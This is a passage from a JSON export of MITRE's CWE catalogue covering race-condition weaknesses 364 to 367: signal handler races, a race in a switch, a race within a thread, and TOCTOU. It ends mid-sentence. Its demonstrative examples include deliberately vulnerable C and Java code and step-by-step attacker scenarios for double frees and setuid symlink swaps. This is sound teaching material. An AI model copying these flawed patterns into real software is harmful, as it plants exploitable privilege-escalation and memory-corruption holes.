Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"364":{"attr":{"@_ID":"364","@_Name":"Signal Handler Race Condition","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a signal handler that introduces a race condition.","Extended_Description":{"xhtml:p":["Race conditions frequently occur in signal handlers, since signal handlers support asynchronous actions. These race conditions have a variety of root causes and symptoms. Attackers may be able to exploit a signal handler race condition to cause the software state to be corrupted, possibly leading to a denial of service or even code execution.","These issues occur when non-reentrant functions, or state-sensitive actions occur in the signal handler, where they may be called at any time. These behaviors can violate assumptions being made by the \\"regular\\" code that is interrupted, or by other signal handlers that may also be invoked. If these functions are called at an inopportune moment - such as while a non-reentrant function is already running - memory corruption could occur that may be exploitable for code execution. Another signal race condition commonly found occurs when free is called within a signal handler, resulting in a double free and therefore a write-what-where condition. Even if a given pointer is set to NULL after it has been freed, a race condition still exists between the time the memory was freed and the pointer was set to NULL. This is especially problematic if the same signal handler has been set for more than one signal -- since it means that the signal handler itself may be reentered.","There are several known behaviors related to signal handlers that have received the label of \\"signal handler race condition\\":","Signal handler vulnerabilities are often classified based on the absence of a specific protection mechanism, although this style of classification is discouraged in CWE because programmers often have a choice of several different mechanisms for addressing the weakness. Such protection mechanisms may preserve exclusivity of access to the shared resource, and behavioral atomicity for the relevant code:"],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Shared state (e.g. global data or static variables) that are accessible to both a signal handler and \\"regular\\" code","Shared state between a signal handler and other signal handlers","Use of non-reentrant functionality within a signal handler - which generally implies that shared state is being used. For example, malloc() and free() are non-reentrant because they may use global or static data structures for managing memory, and they are indirectly used by innocent-seeming functions such as syslog(); these functions could be exploited for memory corruption and, possibly, code execution.","Association of the same signal handler function with multiple signals - which might imply shared state, since the same code and resources are accessed. For example, this can be a source of double-free and use-after-free weaknesses.","Use of setjmp and longjmp, or other mechanisms that prevent a signal handler from returning control back to the original functionality","While not technically a race condition, some signal handlers are designed to be called at most once, and being called more than once can introduce security problems, even when there are not any concurrent calls to the signal handler. This can be a source of double-free and use-after-free weaknesses."]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Avoiding shared state","Using synchronization in the signal handler","Using synchronization in the regular code","Disabling or masking other signals, which provides atomicity (which effectively ensures exclusivity)"]}}]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"362","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"415","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"416","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"123","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"C++","@_Prevalence":"Sometimes"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Modify Application Data","Modify Memory","DoS: Crash, Exit, or Restart","Execute Unauthorized Code or Commands"],"Note":"It may be possible to cause data corruption and possibly execute arbitrary code by modifying global variables or data structures at unexpected times, violating the assumptions of code that uses this global data."},{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"If a signal handler interrupts code that is executing with privileges, it may be possible that the signal handler will also be executed with elevated privileges, possibly making subsequent exploits more severe."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-3"},"Phase":"Requirements","Strategy":"Language Selection","Description":"Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid."},{"Phase":"Architecture and Design","Description":"Design signal handlers to only set flags, rather than perform complex functionality. These flags can then be checked and acted upon within the main program loop."},{"Phase":"Implementation","Description":"Only use reentrant functions within signal handlers. Also, use validation to ensure that state is consistent while performing asynchronous actions that affect the state of execution."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-26"},"Intro_Text":"This code registers the same signal handler function with two different signals (CWE-831). If those signals are sent to the process, the handler creates a log message (specified in the first argument to the program) and exits.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char *logMessage;void handler (int sigNum) {}int main (int argc, char* argv[]) {}","xhtml:br":["","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"syslog(LOG_NOTICE, \\"%s\\\\n\\", logMessage);free(logMessage);sleep(10);exit(0);","xhtml:br":["","","","",""],"xhtml:i":"/* artificially increase the size of the timing window to make demonstration of this weakness easier. */"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"logMessage = strdup(argv[1]);signal(SIGHUP, handler);signal(SIGTERM, handler);sleep(10);","xhtml:br":["","","","","","",""],"xhtml:i":["/* Register signal handlers. */","/* artificially increase the size of the timing window to make demonstration of this weakness easier. */"]}}]}},"Body_Text":["The handler function uses global state (globalVar and logMessage), and it can be called by both the SIGHUP and SIGTERM signals. An attack scenario might follow these lines:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"The program begins execution, initializes logMessage, and registers the signal handlers for SIGHUP and SIGTERM."},{"xhtml:div":"The program begins its \\"normal\\" functionality, which is simplified as sleep(), but could be any functionality that consumes some time."},{"xhtml:div":"The attacker sends SIGHUP, which invokes handler (call this \\"SIGHUP-handler\\")."},{"xhtml:div":"SIGHUP-handler begins to execute, calling syslog()."},{"xhtml:div":"syslog() calls malloc(), which is non-reentrant. malloc() begins to modify metadata to manage the heap."},{"xhtml:div":"The attacker then sends SIGTERM."},{"xhtml:div":"SIGHUP-handler is interrupted, but syslog\'s malloc call is still executing and has not finished modifying its metadata."},{"xhtml:div":"The SIGTERM handler is invoked."},{"xhtml:div":"SIGTERM-handler records the log message using syslog(), then frees the logMessage variable."}]}},"At this point, the state of the heap is uncertain, because malloc is still modifying the metadata for the heap; the metadata might be in an inconsistent state. The SIGTERM-handler call to free() is assuming that the metadata is inconsistent, possibly causing it to write data to the wrong location while managing the heap. The result is memory corruption, which could lead to a crash or even code execution, depending on the circumstances under which the code is running.","Note that this is an adaptation of a classic example as originally presented by Michal Zalewski [REF-360]; the original example was shown to be exploitable for code execution.","Also note that the strdup(argv[1]) call contains a potential buffer over-read (CWE-126) if the program is called without any arguments, because argc would be 0, and argv[1] would point outside the bounds of the array."]},{"attr":{"@_Demonstrative_Example_ID":"DX-48"},"Intro_Text":"The following code registers a signal handler with multiple signals in order to log when a specific event occurs and to free associated memory before exiting.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#include &lt;signal.h&gt;#include &lt;syslog.h&gt;#include &lt;string.h&gt;#include &lt;stdlib.h&gt;void *global1, *global2;char *what;void sh (int dummy) {}int main (int argc,char* argv[]) {}","xhtml:br":["","","","","","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"syslog(LOG_NOTICE,\\"%s\\\\n\\",what);free(global2);free(global1);sleep(10);exit(0);","xhtml:br":["","","","","",""],"xhtml:i":"/* Sleep statements added to expand timing window for race condition */"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"what=argv[1];global1=strdup(argv[2]);global2=malloc(340);signal(SIGHUP,sh);signal(SIGTERM,sh);sleep(10);exit(0);","xhtml:br":["","","","","","","",""],"xhtml:i":"/* Sleep statements added to expand timing window for race condition */"}}]}},"Body_Text":["However, the following sequence of events may result in a double-free (CWE-415):",{"xhtml:ol":{"xhtml:li":[{"xhtml:div":"a SIGHUP is delivered to the process"},{"xhtml:div":"sh() is invoked to process the SIGHUP"},{"xhtml:div":"This first invocation of sh() reaches the point where global1 is freed"},{"xhtml:div":"At this point, a SIGTERM is sent to the process"},{"xhtml:div":"the second invocation of sh() might do another free of global1"},{"xhtml:div":"this results in a double-free (CWE-415)"}]}},"This is just one possible exploitation of the above code. As another example, the syslog call may use malloc calls which are not async-signal safe. This could cause corruption of the heap management structures. For more details, consult the example within \\"Delivering Signals for Fun and Profit\\" [REF-360]."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-0035","Description":"Signal handler does not disable other signal handlers, allowing it to be interrupted, causing other functionality to access files/etc. with raised privileges","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0035"},{"Reference":"CVE-2001-0905","Description":"Attacker can send a signal while another signal handler is already running, leading to crash or execution with root privileges","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0905"},{"Reference":"CVE-2001-1349","Description":"unsafe calls to library functions from signal handler","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1349"},{"Reference":"CVE-2004-0794","Description":"SIGURG can be used to remotely interrupt signal handler; other variants exist","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0794"},{"Reference":"CVE-2004-2259","Description":"SIGCHLD signal to FTP server can cause crash under heavy load while executing non-reentrant functions like malloc/free.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2259"}]},"Functional_Areas":{"Functional_Area":["Signals","Interprocess Communication"]},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Signal handler race condition"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Signal Handling Race Conditions"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Race condition in signal handler"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP19","Entry_Name":"Missing Lock"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-360"}},{"attr":{"@_External_Reference_ID":"REF-361"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 13: Race Conditions.&#34; Page 205"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 13, &#34;Signal Vulnerabilities&#34;, Page 791"}}]},"Notes":{"Note":{"#text":"Probably under-studied.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Observed_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}]}},"365":{"attr":{"@_ID":"365","@_Name":"Race Condition in Switch","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code contains a switch statement in which the switched variable can be modified while the switch is still executing, resulting in unexpected behavior.","Extended_Description":"This issue is particularly important in the case of switch statements that involve fall-through style case statements - i.e., those which do not end with break. If the variable being tested by the switch changes in the course of execution, this could change the intended logic of the switch so much that it places the process in a contradictory state and in some cases could even result in memory corruption.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"367","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"364","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"366","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Alter Execution Logic","Unexpected State"],"Note":"This weakness may lead to unexpected system state, resulting in unpredictable behavior."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Variables that may be subject to race conditions should be locked before the switch statement starts and only unlocked after the statement ends."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example has a switch statement that executes different code depending on the current time.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#include &lt;sys/types.h&gt;#include &lt;sys/stat.h&gt;int main(argc,argv){}","xhtml:br":["",""],"xhtml:div":{"#text":"struct stat *sb;time_t timer;lstat(\\"bar.sh\\",sb);printf(\\"%d\\\\n\\",sb-&gt;st_ctime);switch(sb-&gt;st_ctime % 2){}return 0;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""],"xhtml:div":{"#text":"case 0: printf(\\"One option\\\\n\\");break;case 1: printf(\\"another option\\\\n\\");break;default: printf(\\"huh\\\\n\\");break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]}}}},"Body_Text":"It seems that the default case of the switch statement should never be reached, as st_ctime % 2 should always be 0 or 1. However, if st_ctime % 2 is 1 when the first case is evaluated, the time may change and st_ctime % 2 may be equal to 0 when the second case is evaluated. The result is that neither case 1 or case 2 execute, and the default option is chosen."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Race condition in switch"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP19","Entry_Name":"Missing Lock"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 13: Race Conditions.&#34; Page 205"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Common_Consequences, Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, References, Relationships"}]}},"366":{"attr":{"@_ID":"366","@_Name":"Race Condition within a Thread","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"If two threads of execution use a resource simultaneously, there exists the possibility that resources may be used while invalid, in turn making the state of execution undefined.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"362","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Alter Execution Logic","Unexpected State"],"Note":"The main problem is that -- if a lock is overcome -- data could be altered in a bad state."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use locking functionality. This is the recommended solution. Implement some form of locking mechanism around code which alters or reads persistent data in a multithreaded environment."},{"Phase":"Architecture and Design","Description":"Create resource-locking validation checks. If no inherent locking mechanisms exist, use flags and signals to enforce your own blocking scheme when resources are being used by other threads of execution."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int foo = 0;int storenum(int num) {}","xhtml:br":"","xhtml:div":{"#text":"static int counter = 0;counter++;if (num &gt; foo) foo = num;return foo;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public classRace {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"static int foo = 0;public static void main() {}public static class Threader extends Thread {}","xhtml:br":["",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"new Threader().start();foo = 1;","xhtml:br":["",""]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public void run() {}","xhtml:br":"","xhtml:div":{"#text":"System.out.println(foo);","attr":{"@_style":"margin-left:10px;"}}}}]}}}}]}},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Race condition within a thread"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"CON32-C","Entry_Name":"Prevent data races when accessing bit-fields from multiple threads","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"CON40-C","Entry_Name":"Do not refer to an atomic variable twice in an expression","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"CON43-C","Entry_Name":"Do not allow data races in multithreaded code","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"VNA02-J","Entry_Name":"Ensure that compound operations on shared variables are atomic"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"VNA03-J","Entry_Name":"Do not assume that a group of calls to independently atomic methods is atomic"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP19","Entry_Name":"Missing Lock"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"26"}},{"attr":{"@_CAPEC_ID":"29"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 13: Race Conditions.&#34; Page 205"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 13, &#34;Race Conditions&#34;, Page 759"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}]}},"367":{"attr":{"@_ID":"367","@_Name":"Time-of-check Time-of-use (TOCTOU) Race Condition","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software checks the state of a resource before using that resource, but the resource\'s state can change between the check and the use in a way that invalidates the results of the check. This can cause the software to perform invalid actions when the resource is in an unexpected state.","Extended_Description":"This weakness can be security-relevant when an attacker can influence the state of the resource between check and use. This can happen with shared resources such as files, memory, or even variables in multithreaded programs.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"362","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"362","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"TOCTTOU","Description":"The TOCTTOU acronym expands to \\"Time Of Check To Time Of Use\\"."},{"Term":"TOCCTOU","Description":"The TOCCTOU acronym is most likely a typo of TOCTTOU, but it has been used in some influential documents, so the typo is repeated fairly frequently."}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Other"],"Impact":["Alter Execution Logic","Unexpected State"],"Note":"The attacker can gain access to otherwise unauthorized resources."},{"Scope":["Integrity","Other"],"Impact":["Modify Application Data","Modify Files or Directories","Modify Memory","Other"],"Note":"Race conditions such as this kind may be employed to gain read or write access to resources which are not normally readable or writable by the user in question."},{"Scope":["Integrity","Other"],"Impact":"Other","Note":"The resource in question, or other resources (through the corrupted one), may be changed in undesirable ways by a malicious user."},{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"If a file or other resource is written in this method, as opposed to in a valid way, logging of the activity may not occur."},{"Scope":["Non-Repudiation","Other"],"Impact":"Other","Note":"In some cases it may be possible to delete files a malicious user might not otherwise have access to, such as log files."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"The most basic advice for TOCTOU vulnerabilities is to not perform a check before the use. This does not resolve the underlying issue of the execution of a function on a resource whose state and identity cannot be assured, but it does help to limit the false sense of security given by the check."},{"Phase":"Implementation","Description":"When the file being altered is owned by the current user and group, set the effective gid and uid to that of the current user and group when executing this statement."},{"Phase":"Architecture and Design","Description":"Limit the interleaving of operations on files from multiple processes."},{"Phase":["Implementation","Architecture and Design"],"Description":"If you cannot perform operations atomically and you must share access to the resource between multiple processes or threads, then try to limit the amount of time (CPU cycles) between the check and use of the resource. This will not fix the problem, but it could make it more difficult for an attack to succeed."},{"Phase":"Implementation","Description":"Recheck the resource after the use call to verify that the action was taken appropriately."},{"Phase":"Architecture and Design","Description":"Ensure that some environmental locking mechanism can be used to protect resources effectively."},{"Phase":"Implementation","Description":"Ensure that locking occurs before the check, as opposed to afterwards, such that the resource, as checked, is the same as it is when in use."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code checks a file, then updates its contents.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"struct stat *sb;...lstat(\\"...\\",sb); // it has not been updated since the last time it was readprintf(\\"stated file\\\\n\\");if (sb-&gt;st_mtimespec==...){}","xhtml:br":["","","",""],"xhtml:div":{"#text":"print(\\"Now updating things\\\\n\\");updateThings();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":"Potentially the file could have been updated between the time of the check and the lstat, especially since the printf has latency."},{"Intro_Text":"The following code is from a program installed setuid root. The program performs certain file operations on behalf of non-privileged users, and uses access checks to ensure that it does not use its root privileges to perform operations that should otherwise be unavailable the current user. The program uses the access() system call to check if the person running the program has permission to access the specified file before it opens the file and performs the necessary operations.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if(!access(file,W_OK)) {}else {}","xhtml:div":[{"#text":"f = fopen(file,\\"w+\\");operate(f);...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"fprintf(stderr,\\"Unable to open file %s.\\\\n\\",file);","xhtml:br":""}}],"xhtml:br":""}},"Body_Text":"The call to access() behaves as expected, and returns 0 if the user running the program has the necessary permissions to write to the file, and -1 otherwise. However, because both access() and fopen() operate on filenames rather than on file handles, there is no guarantee that the file variable still refers to the same file on disk when it is passed to fopen() that it did when it was passed to access(). If an attacker replaces file after the call to access() with a symbolic link to a different file, the program will use its root privileges to operate on the file even if it is a file that the attacker would otherwise be unable to modify. By tricking the program into performing an operation that would otherwise be impermissible, the attacker has gained elevated privileges. This type of vulnerability is not limited to programs with root privileges. If the application is capable of performing any operation that the 